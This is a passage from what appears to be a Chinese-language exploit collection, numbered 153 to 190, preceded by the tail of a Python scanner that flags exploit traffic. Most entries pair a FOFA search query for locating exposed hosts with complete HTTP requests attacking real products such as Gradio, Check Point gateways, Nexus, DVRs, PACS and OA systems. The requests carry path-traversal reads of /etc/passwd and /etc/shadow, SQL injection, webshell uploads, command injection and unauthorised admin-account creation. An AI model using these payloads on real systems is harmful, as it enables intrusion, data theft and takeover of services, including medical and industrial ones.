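    prev = None
    for _ in range(3):
        if text == prev:
            break
        prev, text = text, unquote(text)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def b64_or_none(value):
    """Decode base64, tolerating missing padding; None if it is not base64."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_request(req):
    """req = {"line": "GET /path HTTP/1.1", "headers": {...}, "body": "..."}.
    Returns the indicator labels that fired for this request."""
    hits = []
    target = req["line"].split(" ")[1]
    headers = req.get("headers", {})
    haystacks = [normalize(target), normalize(req.get("body", "")),
                 normalize(headers.get("Cookie", ""))]
    for label, rx in INDICATORS:
        if any(rx.search(h) for h in haystacks):
            hits.append(label)
    # CVE-2024-1212 (LoadMaster): the command travels inside the Basic credentials.
    auth = headers.get("Authorization", "")
    if auth.lower().startswith("basic "):
        creds = b64_or_none(auth[6:].strip())
        if creds and SHELL_META.search(creds):
            hits.append("CVE-2024-1212 LoadMaster shell metacharacters in Basic auth: %r" % creds)
    # D-Link: system= is base64, so surface the decoded command for the analyst.
    m = re.search(r"[?&]system=([A-Za-z0-9+/=]+)", target)
    if m:
        cmd = b64_or_none(m.group(1))
        if cmd:
            hits.append("decoded D-Link system= command: %r" % cmd)
    return hits


# Constructed sample traffic modelled on the requests listed on this page.
SAMPLE_REQUESTS = [
    {"line": "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1", "headers": {},
     "body": '{"username": "x", "password": "y"}'},
    {"line": "GET /res/../admin/diagnostic.jsp HTTP/1.1", "headers": {}},
    {"line": "GET /access/set?param=enableapi&value=1 HTTP/1.1",
     "headers": {"Authorization": "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="}},
    {"line": "GET /cgi-bin/nas_sharing.cgi?user=a&passwd=b&cmd=15&system=aWQ= HTTP/1.1", "headers": {}},
    {"line": "POST /template/aui/text-inline.vm HTTP/1.1", "headers": {},
     "body": "label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d"
             ".internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=1"},
    {"line": "GET /global-protect/login.esp HTTP/1.1",
     "headers": {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/x`curl${IFS}example`;"}},
    {"line": "GET /index.html HTTP/1.1", "headers": {"Authorization": "Basic YWRtaW46YWRtaW4="}},
]


def scan_all(requests=SAMPLE_REQUESTS):
    """Map request line -> hits for every request that fired at least one indicator."""
    report = {}
    for req in requests:
        hits = scan_request(req)
        if hits:
            report[req["line"]] = hits
    return report


if __name__ == "__main__":
    for line, hits in scan_all().items():
        print(line)
        for hit in hits:
            print("    ", hit)
```

Run stand-alone it prints six flagged requests; the plain admin:admin login in the last sample is not flagged, which is the point of decoding the credentials instead of matching on the Authorization header as a whole.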
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into its temporary file cache (component_id is one of the ids returned in step 1)
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

Time-based blind against a PostgreSQL backend (PG_SLEEP(5)): a vulnerable host delays its response by about five seconds.

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php (the server renames the file but keeps the .php extension; the declared image/png type is not checked against the content).

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 (INFINITT PACS) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450)

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON) deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi value is fetched as a URL; the file:// scheme turns that fetch into a local file read.

